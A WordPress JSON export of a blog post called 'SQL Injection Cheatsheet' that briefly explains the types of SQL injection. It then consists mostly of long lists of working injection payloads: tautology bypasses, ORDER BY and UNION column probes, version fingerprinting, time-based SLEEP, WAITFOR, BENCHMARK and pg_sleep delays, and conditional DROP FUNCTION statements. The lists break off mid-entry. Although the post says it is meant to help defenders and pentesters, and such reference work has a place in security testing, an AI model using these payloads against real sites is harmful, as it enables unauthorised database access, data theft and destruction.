{"id":717,"date":"2020-02-22T09:21:48","date_gmt":"2020-02-22T09:21:48","guid":{"rendered":"http:\/\/zerothcode.com\/blog\/?p=717"},"modified":"2020-02-22T09:21:48","modified_gmt":"2020-02-22T09:21:48","slug":"sql-injection-cheatsheet","status":"publish","type":"post","link":"https:\/\/zerothcode.com\/blog\/sql-injection-cheatsheet\/","title":{"rendered":"SQL Injection Cheatsheet"},"content":{"rendered":"<p>SQL injection is one of the most common Website security Vulnerability. It is a code injection vulnerability that might dump your database.<\/p>\n<p>I hope, the SQL Injection Cheatsheet is a great source to find the vulnerabilities and help to protect your website.<\/p>\n<p>SQL injection attacks allow attackers to modify the identity, tamper with existing data, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable and become administrators of the database server including can read Insert, update and delete.<\/p>\n<p>SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-718 aligncenter\" src=\"http:\/\/zerothcode.com\/blog\/wp-content\/uploads\/2020\/02\/SQL-Injection-Cheatsheet.png\" alt=\"SQL-Injection-Cheatsheet\" width=\"748\" height=\"458\" srcset=\"https:\/\/zerothcode.com\/blog\/wp-content\/uploads\/2020\/02\/SQL-Injection-Cheatsheet.png 748w, https:\/\/zerothcode.com\/blog\/wp-content\/uploads\/2020\/02\/SQL-Injection-Cheatsheet-300x184.png 300w, https:\/\/zerothcode.com\/blog\/wp-content\/uploads\/2020\/02\/SQL-Injection-Cheatsheet-20x12.png 20w\" sizes=\"auto, (max-width: 748px) 100vw, 748px\" \/><\/p>\n<p>Before we tell you about SQL Injection Cheatsheet , first check it\u2019s types as follow.<\/p>\n<h3>Types of SQL Injection<\/h3>\n<ul>\n<li><strong>In-band SQLi (Classic SQLi)<\/strong><\/li>\n<\/ul>\n<p>In-band SQL Injection is the most common and easy-to-exploit of SQL Injection attacks. In-band SQL Injection occurs when an attacker is able to use the same communication channel to both launch the attack and gather results. The two most common types of in-band SQL Injection are Error-based SQLi and Union-based SQLi.<\/p>\n<ul>\n<li><strong>Error-based SQLi<\/strong><\/li>\n<\/ul>\n<p>Error-based SQLi is an in-band SQL Injection technique that relies on error messages thrown by the database server to obtain information about the structure of the database. In some cases, error-based SQL injection alone is enough for an attacker to enumerate an entire database.<\/p>\n<ul>\n<li><strong>Union-based SQLi<\/strong><\/li>\n<\/ul>\n<p>Union-based SQLi is an in-band SQL injection technique that leverages the UNION SQL operator to combine the results of two or more SELECT statements into a single result which is then returned as part of the HTTP response.<\/p>\n<ul>\n<li><strong>Inferential SQLi (Blind SQLi)<\/strong><\/li>\n<\/ul>\n<p>Inferential SQL Injection, unlike in-band SQLi, may take longer for an attacker to exploit, however, it is just as dangerous as any other form of SQL Injection. In an inferential SQLi attack, no data is actually transferred via the web application and the attacker would not be able to see the result of an attack in-band (which is why such attacks are commonly referred to as \u201cblind SQL Injection attacks\u201d).<\/p>\n<p>Instead, an attacker is able to reconstruct the database structure by sending payloads, observing the web application\u2019s response and the resulting behavior of the database server. The two types of inferential SQL Injection are Blind-boolean-based SQLi and Blind-time-based SQLi.<\/p>\n<ul>\n<li><strong>Boolean-based (content-based)<\/strong><\/li>\n<\/ul>\n<p>Blind SQLi Boolean-based SQL Injection is an inferential SQL Injection technique that relies on sending an SQL query to the database which forces the application to return a different result depending on whether the query returns a TRUE or FALSE result. Depending on the result, the content within the HTTP response will change, or remain the same. This allows an attacker to infer if the payload used returned true or false, even though no data from the database is returned.<\/p>\n<ul>\n<li><strong>Time-based Blind SQLi<\/strong><\/li>\n<\/ul>\n<p>Time-based SQL Injection is an inferential SQL Injection technique that relies on sending an SQL query to the database which forces the database to wait for a specified amount of time (in seconds) before responding. The response time will indicate to the attacker whether the result of the query is TRUE or FALSE. epending on the result, an HTTP response will be returned with a delay, or returned immediately. This allows an attacker to infer if the payload used returned true or false, even though no data from the database is returned.<\/p>\n<ul>\n<li><strong>Out-of-band SQLi<\/strong><\/li>\n<\/ul>\n<p>Out-of-band SQL Injection is not very common, mostly because it depends on features being enabled on the database server being used by the web application. Out-of-band SQL Injection occurs when an attacker is unable to use the same channel to launch the attack and gather results. Out-of-band techniques, offer an attacker an alternative to inferential time-based techniques, especially if the server responses are not very stable (making an inferential time-based attack unreliable).<\/p>\n<ul>\n<li><strong>Voice Based Sql Injection<\/strong><\/li>\n<\/ul>\n<p>It is a sql injection attack method that can be applied in applications that provide access to databases with voice command. An attacker could pull information from the database by sending sql queries with sound.<\/p>\n<p><strong>Also See-<\/strong><a href=\"https:\/\/hackersonlineclub.com\/website-security\/\" target=\"_blank\" rel=\"noopener noreferrer\">\u00a0How Can We Block Common Web Attacks<\/a><\/p>\n<h3>Generic SQL Injection Cheatsheet<\/h3>\n<p>\u2018<br \/>\n\u201d<br \/>\n`<br \/>\n\u201c<br \/>\n,<br \/>\n\u201d<br \/>\n\u201c\u201d<br \/>\n\/<br \/>\n\/\/<br \/>\n\\<br \/>\n\\\\<br \/>\n;<br \/>\n\u2018 or \u201d<br \/>\n\u2014 or #<br \/>\n\u2018 OR \u20181<br \/>\n\u2018 OR 1 \u2014 \u2013<br \/>\n\u201d OR \u201c\u201d = \u201d<br \/>\n\u201d OR 1 = 1 \u2014 \u2013<br \/>\n\u2018 OR \u201d = \u2018<br \/>\n\u2018=\u2019<br \/>\n\u2018LIKE\u2019<br \/>\n\u2018=0\u2013+<br \/>\nOR 1=1<br \/>\n\u2018 OR \u2018x\u2019=\u2019x<br \/>\n\u2018 AND id IS NULL; \u2014<br \/>\n\u201d\u201d\u201d\u201d\u201d\u201d\u2019UNION SELECT \u20182<br \/>\n%00<br \/>\n\/*\u2026*\/<br \/>\n+ addition, concatenate (or space in url)<br \/>\n|| (double pipe) concatenate<br \/>\n% wildcard attribute indicator<\/p>\n<p>@variable local variable<br \/>\n@@variable global variable<\/p>\n<p><strong># Numeric<\/strong><br \/>\nAND 1<br \/>\nAND 0<br \/>\nAND true<br \/>\nAND false<br \/>\n1-false<br \/>\n1-true<br \/>\n1*56<br \/>\n-2<\/p>\n<p>1\u2032 ORDER BY 1\u2013+<br \/>\n1\u2032 ORDER BY 2\u2013+<br \/>\n1\u2032 ORDER BY 3\u2013+<\/p>\n<p>1\u2032 ORDER BY 1,2\u2013+<br \/>\n1\u2032 ORDER BY 1,2,3\u2013+<\/p>\n<p>1\u2032 GROUP BY 1,2,\u2013+<br \/>\n1\u2032 GROUP BY 1,2,3\u2013+<br \/>\n\u2018 GROUP BY columnnames having 1=1 \u2014<\/p>\n<p>-1\u2019 UNION SELECT 1,2,3\u2013+<br \/>\n\u2018 UNION SELECT sum(columnname ) from tablename \u2014<\/p>\n<p>-1 UNION SELECT 1 INTO @,@<br \/>\n-1 UNION SELECT 1 INTO @,@,@<\/p>\n<p>1 AND (SELECT * FROM Users) = 1<\/p>\n<p>\u2018 AND MID(VERSION(),1,1) = \u20185\u2019;<\/p>\n<p>\u2018 and 1 in (select min(name) from sysobjects where xtype = \u2018U\u2019 and name &gt; \u2018.\u2019) \u2014<\/p>\n<p><strong>Finding the table name<\/strong><\/p>\n<p><strong>Time-Based:<\/strong><br \/>\n,(select * from (select(sleep(10)))a)<br \/>\n%2c(select%20*%20from%20(select(sleep(10)))a)<br \/>\n\u2018;WAITFOR DELAY \u20180:0:30\u2019\u2013<\/p>\n<p><strong>Comments:<\/strong><\/p>\n<p># Hash comment<br \/>\n\/* C-style comment<br \/>\n\u2014 \u2013 SQL comment<br \/>\n;%00 Nullbyte<br \/>\n` Backtick<\/p>\n<p><strong>Generic Error Based Payloads<\/strong><\/p>\n<p>OR 1=1<br \/>\nOR 1=0<br \/>\nOR x=x<br \/>\nOR x=y<br \/>\nOR 1=1#<br \/>\nOR 1=0#<br \/>\nOR x=x#<br \/>\nOR x=y#<br \/>\nOR 1=1\u2013<br \/>\nOR 1=0\u2013<br \/>\nOR x=x\u2013<br \/>\nOR x=y\u2013<br \/>\nOR 3409=3409 AND (\u2018pytW\u2019 LIKE \u2018pytW<br \/>\nOR 3409=3409 AND (\u2018pytW\u2019 LIKE \u2018pytY<br \/>\nHAVING 1=1<br \/>\nHAVING 1=0<br \/>\nHAVING 1=1#<br \/>\nHAVING 1=0#<br \/>\nHAVING 1=1\u2013<br \/>\nHAVING 1=0\u2013<br \/>\nAND 1=1<br \/>\nAND 1=0<br \/>\nAND 1=1\u2013<br \/>\nAND 1=0\u2013<br \/>\nAND 1=1#<br \/>\nAND 1=0#<br \/>\nAND 1=1 AND \u2018%\u2019=\u2019<br \/>\nAND 1=0 AND \u2018%\u2019=\u2019<br \/>\nAND 1083=1083 AND (1427=1427<br \/>\nAND 7506=9091 AND (5913=5913<br \/>\nAND 1083=1083 AND (\u20181427=1427<br \/>\nAND 7506=9091 AND (\u20185913=5913<br \/>\nAND 7300=7300 AND \u2018pKlZ\u2019=\u2019pKlZ<br \/>\nAND 7300=7300 AND \u2018pKlZ\u2019=\u2019pKlY<br \/>\nAND 7300=7300 AND (\u2018pKlZ\u2019=\u2019pKlZ<br \/>\nAND 7300=7300 AND (\u2018pKlZ\u2019=\u2019pKlY<br \/>\nAS INJECTX WHERE 1=1 AND 1=1<br \/>\nAS INJECTX WHERE 1=1 AND 1=0<br \/>\nAS INJECTX WHERE 1=1 AND 1=1#<br \/>\nAS INJECTX WHERE 1=1 AND 1=0#<br \/>\nAS INJECTX WHERE 1=1 AND 1=1\u2013<br \/>\nAS INJECTX WHERE 1=1 AND 1=0\u2013<br \/>\nWHERE 1=1 AND 1=1<br \/>\nWHERE 1=1 AND 1=0<br \/>\nWHERE 1=1 AND 1=1#<br \/>\nWHERE 1=1 AND 1=0#<br \/>\nWHERE 1=1 AND 1=1\u2013<br \/>\nWHERE 1=1 AND 1=0\u2013<br \/>\nORDER BY 1\u2013<br \/>\nORDER BY 2\u2013<br \/>\nORDER BY 3\u2013<br \/>\nORDER BY 4\u2013<br \/>\nORDER BY 5\u2013<br \/>\nORDER BY 6\u2013<br \/>\nORDER BY 7\u2013<br \/>\nORDER BY 8\u2013<br \/>\nORDER BY 9\u2013<br \/>\nORDER BY 10\u2013<br \/>\nORDER BY 11\u2013<br \/>\nORDER BY 12\u2013<br \/>\nORDER BY 13\u2013<br \/>\nORDER BY 14\u2013<br \/>\nORDER BY 15\u2013<br \/>\nORDER BY 16\u2013<br \/>\nORDER BY 17\u2013<br \/>\nORDER BY 18\u2013<br \/>\nORDER BY 19\u2013<br \/>\nORDER BY 20\u2013<br \/>\nORDER BY 21\u2013<br \/>\nORDER BY 22\u2013<br \/>\nORDER BY 23\u2013<br \/>\nORDER BY 24\u2013<br \/>\nORDER BY 25\u2013<br \/>\nORDER BY 26\u2013<br \/>\nORDER BY 27\u2013<br \/>\nORDER BY 28\u2013<br \/>\nORDER BY 29\u2013<br \/>\nORDER BY 30\u2013<br \/>\nORDER BY 31337\u2013<br \/>\nORDER BY 1#<br \/>\nORDER BY 2#<br \/>\nORDER BY 3#<br \/>\nORDER BY 4#<br \/>\nORDER BY 5#<br \/>\nORDER BY 6#<br \/>\nORDER BY 7#<br \/>\nORDER BY 8#<br \/>\nORDER BY 9#<br \/>\nORDER BY 10#<br \/>\nORDER BY 11#<br \/>\nORDER BY 12#<br \/>\nORDER BY 13#<br \/>\nORDER BY 14#<br \/>\nORDER BY 15#<br \/>\nORDER BY 16#<br \/>\nORDER BY 17#<br \/>\nORDER BY 18#<br \/>\nORDER BY 19#<br \/>\nORDER BY 20#<br \/>\nORDER BY 21#<br \/>\nORDER BY 22#<br \/>\nORDER BY 23#<br \/>\nORDER BY 24#<br \/>\nORDER BY 25#<br \/>\nORDER BY 26#<br \/>\nORDER BY 27#<br \/>\nORDER BY 28#<br \/>\nORDER BY 29#<br \/>\nORDER BY 30#<br \/>\nORDER BY 31337#<br \/>\nORDER BY 1<br \/>\nORDER BY 2<br \/>\nORDER BY 3<br \/>\nORDER BY 4<br \/>\nORDER BY 5<br \/>\nORDER BY 6<br \/>\nORDER BY 7<br \/>\nORDER BY 8<br \/>\nORDER BY 9<br \/>\nORDER BY 10<br \/>\nORDER BY 11<br \/>\nORDER BY 12<br \/>\nORDER BY 13<br \/>\nORDER BY 14<br \/>\nORDER BY 15<br \/>\nORDER BY 16<br \/>\nORDER BY 17<br \/>\nORDER BY 18<br \/>\nORDER BY 19<br \/>\nORDER BY 20<br \/>\nORDER BY 21<br \/>\nORDER BY 22<br \/>\nORDER BY 23<br \/>\nORDER BY 24<br \/>\nORDER BY 25<br \/>\nORDER BY 26<br \/>\nORDER BY 27<br \/>\nORDER BY 28<br \/>\nORDER BY 29<br \/>\nORDER BY 30<br \/>\nORDER BY 31337<br \/>\nRLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND \u2018Txws\u2019=\u2019<br \/>\nRLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND \u2018Txws\u2019=\u2019<br \/>\nIF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl\u2013<br \/>\nIF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl\u2013<br \/>\n%\u2019 AND 8310=8310 AND \u2018%\u2019=\u2019<br \/>\n%\u2019 AND 8310=8311 AND \u2018%\u2019=\u2019<br \/>\nand (select substring(@@version,1,1))=\u2019X\u2019<br \/>\nand (select substring(@@version,1,1))=\u2019M\u2019<br \/>\nand (select substring(@@version,2,1))=\u2019i\u2019<br \/>\nand (select substring(@@version,2,1))=\u2019y\u2019<br \/>\nand (select substring(@@version,3,1))=\u2019c\u2019<br \/>\nand (select substring(@@version,3,1))=\u2019S\u2019<br \/>\nand (select substring(@@version,3,1))=\u2019X\u2019<\/p>\n<p><strong>Generic Time Based SQL Injection Payloads<\/strong><br \/>\n# from wapiti<br \/>\nsleep(5)#<br \/>\n1 or sleep(5)#<br \/>\n\u201d or sleep(5)#<br \/>\n\u2018 or sleep(5)#<br \/>\n\u201d or sleep(5)=\u201d<br \/>\n\u2018 or sleep(5)=\u2019<br \/>\n1) or sleep(5)#<br \/>\n\u201c) or sleep(5)=\u201d<br \/>\n\u2018) or sleep(5)=\u2019<br \/>\n1)) or sleep(5)#<br \/>\n\u201c)) or sleep(5)=\u201d<br \/>\n\u2018)) or sleep(5)=\u2019<br \/>\n;waitfor delay \u20180:0:5\u2019\u2013<br \/>\n);waitfor delay \u20180:0:5\u2019\u2013<br \/>\n\u2018;waitfor delay \u20180:0:5\u2019\u2013<br \/>\n\u201c;waitfor delay \u20180:0:5\u2019\u2013<br \/>\n\u2018);waitfor delay \u20180:0:5\u2019\u2013<br \/>\n\u201c);waitfor delay \u20180:0:5\u2019\u2013<br \/>\n));waitfor delay \u20180:0:5\u2019\u2013<br \/>\n\u2018));waitfor delay \u20180:0:5\u2019\u2013<br \/>\n\u201c));waitfor delay \u20180:0:5\u2019\u2013<br \/>\nbenchmark(10000000,MD5(1))#<br \/>\n1 or benchmark(10000000,MD5(1))#<br \/>\n\u201d or benchmark(10000000,MD5(1))#<br \/>\n\u2018 or benchmark(10000000,MD5(1))#<br \/>\n1) or benchmark(10000000,MD5(1))#<br \/>\n\u201c) or benchmark(10000000,MD5(1))#<br \/>\n\u2018) or benchmark(10000000,MD5(1))#<br \/>\n1)) or benchmark(10000000,MD5(1))#<br \/>\n\u201c)) or benchmark(10000000,MD5(1))#<br \/>\n\u2018)) or benchmark(10000000,MD5(1))#<br \/>\npg_sleep(5)\u2013<br \/>\n1 or pg_sleep(5)\u2013<br \/>\n\u201d or pg_sleep(5)\u2013<br \/>\n\u2018 or pg_sleep(5)\u2013<br \/>\n1) or pg_sleep(5)\u2013<br \/>\n\u201c) or pg_sleep(5)\u2013<br \/>\n\u2018) or pg_sleep(5)\u2013<br \/>\n1)) or pg_sleep(5)\u2013<br \/>\n\u201c)) or pg_sleep(5)\u2013<br \/>\n\u2018)) or pg_sleep(5)\u2013<br \/>\nAND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND \u2018vRxe\u2019=\u2019vRxe<br \/>\nAND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND \u2018%\u2019=\u2019<br \/>\nAND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)<br \/>\nAND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)\u2013<br \/>\nAND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#<br \/>\nSLEEP(5)#<br \/>\nSLEEP(5)\u2013<br \/>\nSLEEP(5)=\u201d<br \/>\nSLEEP(5)=\u2019<br \/>\nor SLEEP(5)<br \/>\nor SLEEP(5)#<br \/>\nor SLEEP(5)\u2013<br \/>\nor SLEEP(5)=\u201d<br \/>\nor SLEEP(5)=\u2019<br \/>\nwaitfor delay \u201900:00:05\u2032<br \/>\nwaitfor delay \u201900:00:05\u2032\u2013<br \/>\nwaitfor delay \u201900:00:05\u2019#<br \/>\nbenchmark(50000000,MD5(1))<br \/>\nbenchmark(50000000,MD5(1))\u2013<br \/>\nbenchmark(50000000,MD5(1))#<br \/>\nor benchmark(50000000,MD5(1))<br \/>\nor benchmark(50000000,MD5(1))\u2013<br \/>\nor benchmark(50000000,MD5(1))#<br \/>\npg_SLEEP(5)<br \/>\npg_SLEEP(5)\u2013<br \/>\npg_SLEEP(5)#<br \/>\nor pg_SLEEP(5)<br \/>\nor pg_SLEEP(5)\u2013<br \/>\nor pg_SLEEP(5)#<br \/>\n\u2018\\\u201d<br \/>\nAnD SLEEP(5)<br \/>\nAnD SLEEP(5)\u2013<br \/>\nAnD SLEEP(5)#<br \/>\n&amp;&amp;SLEEP(5)<br \/>\n&amp;&amp;SLEEP(5)\u2013<br \/>\n&amp;&amp;SLEEP(5)#<br \/>\n\u2018 AnD SLEEP(5) ANd \u20181<br \/>\n\u2018&amp;&amp;SLEEP(5)&amp;&amp;\u20191<br \/>\nORDER BY SLEEP(5)<br \/>\nORDER BY SLEEP(5)\u2013<br \/>\nORDER BY SLEEP(5)#<br \/>\n(SELECT * FROM (SELECT(SLEEP(5)))ecMj)<br \/>\n(SELECT * FROM (SELECT(SLEEP(5)))ecMj)#<br \/>\n(SELECT * FROM (SELECT(SLEEP(5)))ecMj)\u2013<br \/>\n+benchmark(3200,SHA1(1))+\u2019<br \/>\n+ SLEEP(10) + \u2018<br \/>\nRANDOMBLOB(500000000\/2)<br \/>\nAND 2947=LIKE(\u2018ABCDEFG\u2019,UPPER(HEX(RANDOMBLOB(500000000\/2))))<br \/>\nOR 2947=LIKE(\u2018ABCDEFG\u2019,UPPER(HEX(RANDOMBLOB(500000000\/2))))<br \/>\nRANDOMBLOB(1000000000\/2)<br \/>\nAND 2947=LIKE(\u2018ABCDEFG\u2019,UPPER(HEX(RANDOMBLOB(1000000000\/2))))<br \/>\nOR 2947=LIKE(\u2018ABCDEFG\u2019,UPPER(HEX(RANDOMBLOB(1000000000\/2))))<br \/>\nSLEEP(1)\/*\u2019 or SLEEP(1) or \u2018\u201d or SLEEP(1) or \u201c*\/<\/p>\n<p><strong>Generic Union Select Payloads<\/strong><\/p>\n<p>ORDER BY SLEEP(5)<br \/>\nORDER BY 1,SLEEP(5)<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019))<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16,17<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30<br \/>\nORDER BY SLEEP(5)#<br \/>\nORDER BY 1,SLEEP(5)#<br \/>\nORDER BY 1,SLEEP(5),3#<br \/>\nORDER BY 1,SLEEP(5),3,4#<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5#<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6#<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7#<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8#<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9#<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10#<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11#<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12#<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13#<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14#<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14#<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15#<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16#<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16,17#<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#<br \/>\nORDER BY SLEEP(5)\u2013<br \/>\nORDER BY 1,SLEEP(5)\u2013<br \/>\nORDER BY 1,SLEEP(5),3\u2013<br \/>\nORDER BY 1,SLEEP(5),3,4\u2013<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5\u2013<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6\u2013<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7\u2013<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8\u2013<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9\u2013<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10\u2013<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11\u2013<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12\u2013<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13\u2013<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14\u2013<br \/>\nORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(\u2018A\u2019)),4,5,6,7,8,9,10,11,12,13,14\u2013<br \/>\nORDER BY 